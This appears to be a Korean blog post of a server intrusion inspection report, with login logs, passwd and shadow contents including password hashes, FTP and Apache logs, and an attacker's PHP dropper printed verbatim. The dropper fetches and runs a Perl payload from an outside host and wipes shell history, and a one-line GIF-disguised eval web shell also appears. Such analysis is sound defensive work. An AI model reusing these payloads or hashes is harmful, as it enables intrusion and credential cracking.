[해킹점검]



[해킹점검시 유용한 명령어]

[root@localhost src]# w    

[root@localhost src]# netstat -anutp

[root@localhost src]# cat /var/log/messages 및 모든 로그 확인  // 로그 글자가 깨져 있거나 특정 시간대가 통째로 비어 있으면 로그 변조(크래킹·해킹) 의심

[root@localhost src]# pstree -p 계정명   // 계정명 자리에 확인할 계정(예: nobody) 또는 PID를 넣어 프로세스 트리와 부모 프로세스 확인

[root@localhost src]# lsof | grep 계정명   // 또는 lsof -u 계정명 으로 해당 계정이 열어 둔 파일·소켓 확인

[root@localhost src]# last -n 100   // wtmp 기반이므로 변조될 수 있음. lastlog, secure 로그와 교차 확인

[root@localhost src]# vi /etc/passwd , /etc/shadow   // 열람만 할 경우 실수로 수정되지 않도록 less 사용 권장



[아래 내용은 최근 100회 로그인 내역입니다]

점검한 PC(115.68.87.2로 추정)와 106.248.76.211(고객측 아이피로 추정)에서만 접근 로그가 있으며, 이상 없는 것으로 판단. 다만 아래 목록에는 106.248.76.221(같은 대역)과 222.122.6.29(1월 9일, pts/1), localhost 접속도 있으므로, 이 IP들도 고객측에서 사용한 것이 맞는지 함께 확인이 필요함.

 

[root@localhost src]# last -n 100

15445077 pts/2 115.68.87.2 Sat Sep 17 13:09 still logged in

15445077 pts/0 115.68.87.2 Sat Sep 17 12:41 still logged in

15445077 pts/0 115.68.87.2 Sat Sep 17 12:30 - 12:31 (00:00)

15445077 pts/1 115.68.87.2 Sat Sep 17 12:16 still logged in

15445077 pts/0 115.68.87.2 Sat Sep 17 11:15 - 12:30 (01:14)

15445077 pts/0 115.68.87.2 Thu Sep 1 18:11 - 19:17 (01:05)

15445077 pts/0 106.248.76.211 Wed Jun 22 11:28 - 18:48 (07:19)

root pts/0 115.68.87.2 Thu Jun 9 15:14 - 15:28 (00:14)

15445077 pts/0 106.248.76.211 Wed Jun 8 13:33 - 19:39 (06:05)

15445077 pts/1 106.248.76.211 Wed Jun 8 10:59 - 13:24 (02:25)

root pts/0 115.68.87.2 Wed Jun 8 10:50 - 11:05 (00:15)

15445077 pts/0 115.68.87.2 Wed Jun 8 10:47 - 10:48 (00:01)

15445077 pts/0 106.248.76.221 Tue May 24 17:34 - 18:01 (00:26)

15445077 pts/0 106.248.76.221 Thu May 19 10:43 - 17:57 (07:13)

15445077 pts/1 localhost Tue Apr 5 00:21 - 00:23 (00:02)

15445077 pts/0 localhost Tue Apr 5 00:16 - 00:23 (00:07)

15445077 pts/0 106.248.76.221 Fri Apr 1 10:15 - 14:07 (03:51)

15445077 pts/0 106.248.76.221 Mon Mar 28 17:48 - 18:13 (00:25)

15445077 pts/0 106.248.76.221 Fri Mar 25 10:37 - 11:07 (00:29)

15445077 pts/1 115.68.87.2 Fri Mar 4 10:24 - 11:02 (00:38)

15445077 pts/1 106.248.76.221 Fri Jan 29 10:52 - 17:15 (06:23)

15445077 pts/1 106.248.76.221 Thu Jan 28 10:41 - 18:34 (07:52)

15445077 pts/1 106.248.76.221 Wed Jan 27 11:05 - 18:14 (07:09)

15445077 pts/1 106.248.76.221 Mon Jan 25 13:22 - 18:19 (04:56)

15445077 pts/1 106.248.76.221 Mon Jan 25 10:15 - 11:39 (01:24)

15445077 pts/1 106.248.76.221 Fri Jan 15 16:54 - 18:43 (01:48)

15445077 pts/1 106.248.76.221 Thu Jan 14 16:53 - 18:21 (01:27)

15445077 pts/1 106.248.76.221 Mon Jan 11 11:26 - 15:27 (04:00)

15445077 pts/1 115.68.87.2 Mon Jan 11 05:44 - 05:46 (00:02)

15445077 pts/1 115.68.87.2 Sat Jan 9 10:18 - 10:20 (00:01)

15445077 pts/1 115.68.87.2 Sat Jan 9 10:12 - 10:14 (00:01)

15445077 pts/2 115.68.87.2 Sat Jan 9 09:52 - 10:12 (00:20)

15445077 pts/1 222.122.6.29 Sat Jan 9 09:44 - 10:11 (00:27)

root pts/1 115.68.87.2 Sat Jan 9 05:33 - 08:58 (03:25)

root pts/1 115.68.87.2 Sat Jan 9 05:17 - 05:33 (00:15)

15445077 pts/2 115.68.87.2 Fri Jan 8 18:06 - 18:26 (00:20)

15445077 pts/3 115.68.87.2 Fri Jan 8 17:54 - 17:55 (00:00)

15445077 pts/2 115.68.87.2 Fri Jan 8 17:53 - 18:03 (00:10)

15445077 pts/3 115.68.87.2 Fri Jan 8 16:59 - 17:08 (00:09)

15445077 pts/3 115.68.87.2 Fri Jan 8 16:55 - 16:58 (00:03)

15445077 pts/3 115.68.87.2 Fri Jan 8 16:44 - 16:46 (00:02)

15445077 pts/2 115.68.87.2 Fri Jan 8 16:39 - 17:44 (01:05)

15445077 pts/2 115.68.87.2 Fri Jan 8 16:36 - 16:38 (00:02)

15445077 pts/1 106.248.76.221 Fri Jan 8 10:36 - 18:37 (08:01)

15445077 pts/1 106.248.76.221 Wed Jan 6 15:40 - 18:31 (02:50)

15445077 pts/1 106.248.76.221 Tue Jan 5 15:13 - 18:38 (03:25)

15445077 pts/1 106.248.76.221 Mon Jan 4 15:30 - 18:07 (02:36)

root pts/1 115.68.87.2 Mon Jan 4 14:45 - 15:06 (00:21)

15445077 pts/1 106.248.76.221 Wed Dec 30 18:08 - 19:00 (00:52)

root pts/1 115.68.87.2 Wed Dec 30 17:03 - 17:05 (00:02)

root pts/1 115.68.87.2 Wed Dec 30 16:52 - 17:03 (00:10)

15445077 pts/1 115.68.87.2 Wed Dec 30 16:52 - 16:52 (00:00)

root pts/2 115.68.87.2 Tue Dec 29 11:25 - 11:39 (00:13)

15445077 pts/2 115.68.87.2 Tue Dec 29 11:25 - 11:25 (00:00)

15445077 pts/1 106.248.76.221 Tue Dec 29 10:14 - 19:30 (09:15)

15445077 pts/2 106.248.76.221 Mon Dec 28 16:13 - 18:25 (02:11)

root pts/1 115.68.87.2 Mon Dec 28 15:47 - 17:34 (01:47)

15445077 pts/1 106.248.76.221 Thu Dec 24 10:12 - 19:06 (08:54)

15445077 pts/1 106.248.76.221 Wed Dec 23 11:37 - 18:39 (07:01)

root tty1 Wed Dec 23 13:41 still logged in

15445077 pts/1 115.68.87.2 Wed Dec 23 13:38 - 04:46 (-8:-51)

15445077 pts/2 115.68.87.2 Wed Dec 23 01:21 - 01:21 (00:00)

15445077 pts/1 106.248.76.221 Tue Dec 22 18:54 - 02:41 (07:46)

15445077 pts/2 115.68.87.2 Tue Dec 22 02:51 - 03:13 (00:22)

15445077 pts/1 106.248.76.221 Tue Dec 22 01:47 - 04:12 (02:24)

15445077 pts/1 106.248.76.221 Mon Dec 21 21:43 - 01:04 (03:20)

15445077 pts/1 106.248.76.221 Thu Dec 17 00:46 - 02:58 (02:11)

15445077 pts/1 106.248.76.221 Mon Dec 14 22:58 - 04:03 (05:05)

15445077 pts/1 106.248.76.221 Wed Dec 9 22:31 - 00:26 (01:55)

15445077 pts/1 106.248.76.221 Wed Dec 9 00:14 - 04:36 (04:21)

15445077 pts/1 115.68.87.2 Sat Dec 5 18:19 - 18:19 (00:00)

root pts/2 115.68.87.2 Fri Dec 4 01:11 - 01:53 (00:42)

15445077 pts/1 106.248.76.221 Fri Dec 4 00:58 - 04:10 (03:12)

root pts/1 115.68.87.2 Fri Dec 4 00:55 - 00:56 (00:00)

15445077 pts/1 115.68.87.2 Fri Dec 4 00:20 - 00:20 (00:00)

root pts/1 115.68.87.2 Fri Dec 4 00:20 - 00:20 (00:00)

root pts/2 115.68.87.2 Fri Dec 4 00:03 - 00:20 (00:17)

root tty1 Fri Dec 4 00:00 - 01:42 (01:41)

15445077 pts/1 115.68.87.2 Thu Dec 3 23:56 - 00:08 (00:12)

15445077 pts/1 115.68.87.2 Thu Dec 3 23:53 - 23:54 (00:01)

root pts/0 115.68.87.2 Thu Dec 3 23:15 - 23:29 (00:14)

root pts/0 115.68.87.2 Thu Dec 3 18:21 - 19:40 (01:19)

root pts/0 115.68.87.2 Thu Dec 3 01:51 - 03:16 (01:25)

 

 

 

[아래 passwd파일에 대한 설명]

bash 권한을 가지고 있는 계정은 root, 15445077, edu 3개 계정만 확인되며, 이 부분에서는 문제가 없는 것으로 판단. (시스템 계정의 홈 디렉터리·셸이 기본값과 다른지도 함께 비교하면 좋음.)

또한 UID가 0으로 되어 있으면 일반 계정도 root 권한을 가지게 되는데, 확인 결과 이상 계정 없음.

 

# vi /etc/passwd

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin

abrt:x:173:173::/etc/abrt:/sbin/nologin

rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

ntp:x:38:38::/etc/ntp:/sbin/nologin

saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin

postfix:x:89:89::/var/spool/postfix:/sbin/nologin

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin

tcpdump:x:72:72::/:/sbin/nologin

mysql:x:400:400::/usr/local/mysql:/bin/false

15445077:x:500:500::/home/15445077:/bin/bash

mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin

smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

edu:x:501:100::/home/edu:/bin/bash

 

 

 

[아래 shadow 파일에 대한 설명입니다.]

해당 파일에는 각 계정의 패스워드가 해시 형태로 저장되어 있는데, 두 번째 필드(해시)가 비어 있는 계정은 비밀번호 없이 로그인이 가능하므로 그 계정이 해킹에 사용된 계정으로 의심할 수 있습니다. (`*`, `!!`는 로그인이 잠긴 계정으로 정상입니다.)

Shadow 파일은 이상이 없는 것으로 보임. 다만 세 번째 필드(마지막 비밀번호 변경일)가 root와 15445077 모두 17045로 동일하므로, 고객이 직접 변경한 것인지 확인을 권장.

 

# vi /etc/shadow

root:$6$laqpukkw$56tn8pZ8cOrwoHdQj6YiWunDDA5jrDyyJpgKRJX7x520Wj0v9KK76JBkY6yDqT.yPkiJqxDvoUCNQcSAq0PKr.:17045:0:99999:7:::

bin:*:15980:0:99999:7:::

daemon:*:15980:0:99999:7:::

adm:*:15980:0:99999:7:::

lp:*:15980:0:99999:7:::

sync:*:15980:0:99999:7:::

shutdown:*:15980:0:99999:7:::

halt:*:15980:0:99999:7:::

mail:*:15980:0:99999:7:::

uucp:*:15980:0:99999:7:::

operator:*:15980:0:99999:7:::

games:*:15980:0:99999:7:::

gopher:*:15980:0:99999:7:::

ftp:*:15980:0:99999:7:::

nobody:*:15980:0:99999:7:::

dbus:!!:16771::::::

vcsa:!!:16771::::::

rpc:!!:16771:0:99999:7:::

abrt:!!:16771::::::

rpcuser:!!:16771::::::

nfsnobody:!!:16771::::::

haldaemon:!!:16771::::::

ntp:!!:16771::::::

saslauth:!!:16771::::::

postfix:!!:16771::::::

sshd:!!:16771::::::

oprofile:!!:16771::::::

tcpdump:!!:16771::::::

mysql:!!:16771:0:99999:7:::

15445077:$6$Duw5orzQ$FyCRVB5mQ7Og3XEB1p8crhm2pLC/2k3QYgTY/rCYSJkYG8hWHaL7jth4oEaPVRQVc7UGUsASK25mkCawYZB0d/:17045:0:99999:7:::

mailnull:!!:16771::::::

smmsp:!!:16771::::::

edu:$6$47LUPpye$eBuUcfNpZSLQW5Zil2S7cocuHAXUt6gmwmAAaWu/J7uGPKqzP5feeAijgV83MVty3X.svjpqYaNE8PnqHvJBX0:16772:0:99999:7:::

 

 

 

[lastlog 입니다. 계정별로 마지막으로 로그인했던 내역을 보여줍니다.]

root(115.68.87.2, 점검 PC에서 접속한 것으로 추정)를 제외하면, 고객님께서 사용하시는 15445077 계정 외 로그인 기록은 없음.

 

사용자이름 포트 어디서 최근정보

root pts/0 115.68.87.2 69 15:14:33 +0900 2016

bin **한번도 로그인한 적이 없습니다**

daemon **한번도 로그인한 적이 없습니다**

adm **한번도 로그인한 적이 없습니다**

lp **한번도 로그인한 적이 없습니다**

sync **한번도 로그인한 적이 없습니다**

shutdown **한번도 로그인한 적이 없습니다**

halt **한번도 로그인한 적이 없습니다**

mail **한번도 로그인한 적이 없습니다**

uucp **한번도 로그인한 적이 없습니다**

operator **한번도 로그인한 적이 없습니다**

games **한번도 로그인한 적이 없습니다**

gopher **한번도 로그인한 적이 없습니다**

ftp **한번도 로그인한 적이 없습니다**

nobody **한번도 로그인한 적이 없습니다**

dbus **한번도 로그인한 적이 없습니다**

vcsa **한번도 로그인한 적이 없습니다**

rpc **한번도 로그인한 적이 없습니다**

abrt **한번도 로그인한 적이 없습니다**

rpcuser **한번도 로그인한 적이 없습니다**

nfsnobody **한번도 로그인한 적이 없습니다**

haldaemon **한번도 로그인한 적이 없습니다**

ntp **한번도 로그인한 적이 없습니다**

saslauth **한번도 로그인한 적이 없습니다**

postfix **한번도 로그인한 적이 없습니다**

sshd **한번도 로그인한 적이 없습니다**

oprofile **한번도 로그인한 적이 없습니다**

tcpdump **한번도 로그인한 적이 없습니다**

mysql **한번도 로그인한 적이 없습니다**

15445077 pts/2 115.68.87.2 917 13:09:10 +0900 2016

mailnull **한번도 로그인한 적이 없습니다**

smmsp **한번도 로그인한 적이 없습니다**

edu **한번도 로그인한 적이 없습니다**

 

  

[의심되는 아파치 로그]

아래 내용은 아파치 로그로 보이며, y.cyberunder.org에서 read.txt 파일을 다운로드(curl·wget·lwp-download)하여 perl로 실행한 출력이 기록된 것으로 보임.

계속 요청하는 것으로 보아 문제가 있는 것으로 판단. 참고로 perl 오류(`near "IE 7"`, `near "[if"`)는 받아온 read.txt가 perl 스크립트가 아니라 HTML 페이지였음을 시사하므로, 격리한 read.txt(54036바이트)의 내용을 직접 확인해 실제로 실행된 페이로드가 무엇인지 판단할 필요가 있음.

 

% Total % Received % Xferd Average Speed Time Time Time Current

Dload Upload Total Spent Left Speed

^M 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0^M100 8314 0 8314 0 0 12262 0 --:--:-- --:--:-- --:--:-- 17429^M100 54036 0 54036 0 0 54731 0 --:--:-- --:--:-- --:--:-- 68748

Number found where operator expected at read.txt line 2, near "IE 7"

(Do you need to predeclare IE?)

syntax error at read.txt line 2, near "[if"

Glob not terminated at read.txt line 5.

--2016-09-07 10:01:15-- http://y.cyberunder.org/read.txt

Resolving y.cyberunder.org... 104.27.132.20, 104.27.133.20

Connecting to y.cyberunder.org|104.27.132.20|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: unspecified [text/plain]

Saving to: `read.txt'

 

0K .......... .......... .......... .......... .......... 157K

50K .. 394K=0.3s

 

2016-09-07 10:01:16 (162 KB/s) - `read.txt' saved [54036]

Can't open perl script "read.txt": 그런 파일이나 디렉터리가 없습니다

Can't open perl script "read.txt.txt": 그런 파일이나 디렉터리가 없습니다

 

   

[의심되는 프로세스]

nobody(웹서버 실행 계정으로 추정) 권한으로 의심되는 프로세스가 구동 중.

해당 프로세스들 중지 조치. 부모 PID 15597이 어떤 프로세스(웹서버 워커 등)인지 확인하고, 중지 전에 `ps -ef`, `lsof -p PID` 결과를 보존해 둘 것을 권장.

 

nobody 18227 15597 0 13:41 ? 00:00:00 sh -c cd '/home/15445077' ; cd /tmp;lwp-download http://y.cyberunder.org/read.txt;perl read.txt;p

 

nobody 18228 18227 0 13:41 ? 00:00:00 /usr/bin/perl -w /usr/bin/lwp-download http://y.cyberunder.org/read.txt

 

  

 

[ftp 의심되는 로그 및 조치내용]

177.41.158.46, 186.214.147.149 IP에서 고객님 15445077 계정으로 FTP 접속하여

/home/15445077/ 경로에 outon.php 파일을 업로드한 로그 확인. 서로 다른 두 IP에서 같은 계정으로 로그인했으므로 15445077 계정의 FTP 비밀번호가 유출된 것으로 보고 즉시 변경해야 함.

outon.php 파일 내용을 토대로 문제가 있을 것으로 판단되는 아래 파일들을 /usr/local/src/hacking.tar로 격리 조치. (격리 전 md5sum/sha256sum 해시를 기록해 두면 재발 시 비교에 유용하며, outon.php는 웹 루트에 있었으므로 access_log에서 해당 파일 요청 기록(요청 IP·시각)도 확인 필요.)

“Outon.php” , “rm.txt” , “read.txt” , “scan.sc” , “neutrinos.sc” (/tmp에 위치했던 파일)

 

 

ftp로그

Wed Sep 7 01:19:39 2016 1 177.41.158.46 4765 /home/15445077/outon.php a _ i r 15445077 ftp 0 * c

Mon Sep 12 10:28:05 2016 1 186.214.147.149 4765 /home/15445077/outon.php a _ i r 15445077 ftp 0 * c

 

  

outon.php 파일의 내용

<?php
// Analyst annotation (incident report exhibit): this is the attacker-uploaded
// dropper recovered from /home/15445077/outon.php (see the FTP log above).
// The code is kept verbatim as evidence; only these comments were added.

// Payload host — an IoC for egress blocking and for searching proxy/DNS logs.
$url="http://y.cyberunder.org/";

// Every line below repeats the same sequence: cd /tmp, fetch read.txt with
// whichever downloader exists on the host (curl, GET, wget, lwp-download,
// fetch, lynx), run it with perl, then delete the download. The sequence is
// repeated across exec/passthru/system/shell_exec/popen so that it still runs
// when some of those PHP functions are disabled — blocking a single function
// via disable_functions is therefore not an effective mitigation on its own.
exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');

exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

// The lwp-download variant is the one visible in the process listing above
// (pid 18227/18228), so this path is the one that actually ran on this host.
exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');

exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');

passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');

system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');

shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

// The popen variants additionally run `rm -f $HISTFILE` — an anti-forensic
// step, so the shell history of the web-server account cannot be relied on
// when reconstructing the timeline.
popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

// From here on the same calls are repeated with '@' (error suppression), so
// PHP's own warnings are not written to the web-server error log — presumably
// why the Apache log above contains only the download tools' own output.
@exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

@exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;');

@exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

@exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');

@exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

@passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

@passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

@passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');

@passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

@passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

@system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

@system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

@system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

@system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');

@system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

@shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

@shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

@shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;');

@shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;');

@shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;');

@popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

@popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

@popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

@popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

@popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

@popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r");

?>

 

  

chkrootkit, rkhunter를 이용하여 확인한 결과 이상 없음.

해당 툴은 rootkit 설치 여부 검사, 주요 파일의 소유권·권한 점검, 데몬 이상 여부 검사 기능을 가지고 있음. (시그니처 기반이므로 최신 DB로 갱신한 뒤 실행해야 하며, 커널 레벨 rootkit은 탐지하지 못할 수 있음.)

  

[secure 로그]

중국, 프랑스, 방글라데시 등에서 접근 시도는 있었지만 접속은 하지 못함(로그상 root 및 존재하지 않는 계정 guest 대상의 Failed password).

elcap 방화벽 사용, 원격접속 포트 변경, 복잡한 패스워드로 바꾸실 것을 권유. 아울러 시도 대부분이 root 대상이므로 sshd에서 root 직접 로그인 차단(PermitRootLogin no)과 키 인증 사용을 권장.

 

Sep 1 00:26:03 localhost sshd[10671]: Failed password for root from 121.18.238.20 port 38305 ssh2

Sep 1 00:25:59 localhost sshd[10630]: Failed password for root from 218.87.109.246 port 8754 ssh2

Sep 1 14:11:20 localhost sshd[5205]: Failed password for root from 116.31.116.5 port 50223 ssh2

Sep 18 04:04:50 localhost sshd[16167]: Failed password for root from 123.49.57.222 port 34239 ssh2

Sep 18 21:00:26 localhost sshd[32386]: Failed password for invalid user guest from 212.129.9.163 port 50479 ssh2

 

  

[휘슬 결과]

휘슬이란 Web Hacking Inspection Security Tool의 약자로서, 공격자가 웹서버에 설치한 백도어 프로그램인 웹쉘과 악성코드 은닉 사이트를 탐지하는 프로그램입니다.

아래 내용은 의심되는 휘슬 결과입니다. 소스 코드 부분을 한번 확인 권유. 특히 [5] /home/15445077/board/upload/15445077_20160404230435.php 는 `@eval($_POST['#'])` 한 줄 뒤에 GIF 헤더(GIF89a)를 붙여 이미지처럼 위장한 전형적인 원라인 웹쉘이므로 즉시 격리·삭제가 필요하며, 파일명의 날짜(2016-04-04로 추정)가 9월의 FTP 업로드보다 앞서므로 침해 시작 시점을 그 이전으로 보고 access_log에서 해당 파일에 대한 POST 요청(IP·시각)을 추적할 필요가 있음. 게시판 업로드 디렉터리에는 php 실행 차단(업로드 확장자 제한 및 웹서버 설정)이 필요함. [1]~[4]의 dump.php 는 백업 플러그인의 정상 코드일 가능성이 있으나(테이블명을 그대로 쿼리에 넣는 구문), 직접 확인 필요.

 

[1] [1 Found] /home/15445077/log/plug_in/data_backup_manager_english/dump.php

[2] [1 Found] /home/15445077/log/plug_in/data_backup_manager_korean/dump.php

[3] [1 Found] /home/15445077/log/plug_in/data_backup_manager_japanese/dump.php

[4] [1 Found] /home/15445077/log/plug_in/data_backup_manager_chinese_big5/dump.php

[5] [1 Found] /home/15445077/board/upload/15445077_20160404230435.php

 

[1 Found] /home/15445077/log/plug_in/data_backup_manager_english/dump.php

[Web Shell] : 135 : $data=mysql_fetch_array(mysql_query("show create table `$table_name`"));

 

[1 Found] /home/15445077/log/plug_in/data_backup_manager_korean/dump.php

[Web Shell] : 135 : $data=mysql_fetch_array(mysql_query("show create table `$table_name`"));

 

[1 Found] /home/15445077/log/plug_in/data_backup_manager_japanese/dump.php

[Web Shell] : 135 : $data=mysql_fetch_array(mysql_query("show create table `$table_name`"));

 

[1 Found] /home/15445077/log/plug_in/data_backup_manager_chinese_big5/dump.php

[Web Shell] : 135 : $data=mysql_fetch_array(mysql_query("show create table `$table_name`"));

 

[1 Found] /home/15445077/board/upload/15445077_20160404230435.php

[Web Shell] : 2 : <?php @eval($_POST['#']);?>GIF89aGIF89a

 

 

 

해킹점검 요약

177.41.158.46 186.214.147.149 IP에서 고객님 15445077계정으로 접속하여

/home/15445077/ 경로에 outon.php 파일을 업로드한 로그 확인.

nobody 권한으로 해당 프로세스가 구동중이었으며, 해당 프로세스 구동중지시킴.

Outon.php 파일내용을 토대로 문제가 있을것으로 판단되는 아래 파일들을 /usr/local/src/hacking.tar로 격리조치.

“Outon.php” , “rm.txt” , “read.txt” , “scan.sc” , “neutrinos.sc” (이 외 휘슬 결과 [5]의 board/upload 웹쉘 파일도 별도 격리·삭제하고, 15445077 계정의 FTP 비밀번호를 변경해야 함)


Posted by 실력키우기
